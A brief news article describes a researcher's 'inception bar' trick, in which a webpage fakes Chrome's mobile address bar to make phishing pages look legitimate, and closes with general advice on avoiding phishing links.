Sneaky trick could make mobile phishing scams very convincing

ByCraig Haley

A security engineer has discovered a way to trick visitors using mobile browsers that they’re on an entirely different website – a trick that could be used to create a very convincing phishing scam.

How do you know if you’re on a phishing website that’s trying to steal your login credentials?

Easy, you look at the web address in the address bar at the top of the browser. So for example, if you’re presented with the Facebook login page, you check to see if the web address is facebook.com. If it’s not, then you’re probably on a phishing webpage.


Sponsored Content. Continued below...




But what if crooks can edit the web address bar to say what they want? Or better, yet, replace the address bar entirely with their own version?

But how?

Security researcher found a way that crooks could do just that on certain mobile browsers like Google Chrome. Browsers like Chrome’s mobile browser will collapse the address bar when you visit a webpage and begin to scroll downwards in order to maximise screen space so you can see as much of the website as possible.

Fisher discovered a way to get a malicious webpage to load a fake web address bar when Chrome collapsed the real address bar. Of course, the webpage isn’t loading a real address bar, rather just elements from within the browser that are purposely designed to look like a real address bar. Basically, it’s an illusion. Fisher calls it the “inception bar“.


Sponsored Content. Continued below...




What’s more, Fisher also managed to find a way for the webpage to load code that prevents the browser reloading the real address bar when the user begins to scroll upwards, which is the usual behaviour of the Chrome browser. You can see the trick at work on Fisher’s website here.

Theoretically using this trick, crooks could persuade visitors that they are on an entirely different website, which is great for phishing scammers.

Fisher calls the trick a security vulnerable in the Chrome mobile browser and suggests Google could get around it by no longer completely collapsing the address bar. And how can you protect yourself against it? It can be extremely difficult depending on how well this trick is implemented. The best way not to land on these phishing or malicious webpages in the first place is to never click on links in emails and messages that you were not expecting, and always be familiar with the most common types of phishing scams.

For more some information on phishing scams, how they work and how to avoid them, click here.